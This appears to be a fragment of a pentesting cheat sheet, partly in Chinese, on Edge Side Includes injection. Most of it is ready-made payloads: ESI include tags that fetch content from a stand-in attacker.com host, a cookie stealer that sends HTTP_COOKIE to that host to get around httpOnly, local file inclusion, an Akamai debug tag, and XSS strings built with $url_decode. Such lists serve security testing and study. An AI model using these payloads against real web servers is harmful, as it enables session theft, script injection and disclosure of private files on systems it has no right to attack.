// Basic detectionhell<!--esi-->o// If previous is reflected as "hello", it's vulnerable// Blind detection<esi:includesrc=http://attacker.com>// XSS Exploitation Example<esi:include src=http://attacker.com/XSSPAYLOAD.html>// Cookie Stealer (bypass httpOnly flag)<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>// Introduce private local files (Not LFI per se)<esi:include src="supersecret.txt">// Valid for Akamai, sends debug information in the response<esi:debug/>
ESI 利用
GoSecure 创建了 一个表格,以了解我们可以针对不同 ESI 能力软件尝试的可能攻击,具体取决于支持的功能:
Includes: 支持 <esi:includes> 指令
Vars: 支持 <esi:vars> 指令。用于绕过 XSS 过滤器
Cookie: 文档 cookies 对 ESI 引擎可访问
Upstream Headers Required: 代理应用程序不会处理 ESI 语句,除非上游应用程序提供头信息
# This will reflect the cookies in the response<!--esi $(HTTP_COOKIE) --># Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)<!--esi/$url_decode('"><svg/onload=prompt(1)>')/--># It's possible to put more complex JS code to steal cookies or perform actions
<!--esi/$add_header('Content-Type','text/html')/--><!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/--># Check the number of url_decode to know how many times you can URL encode the value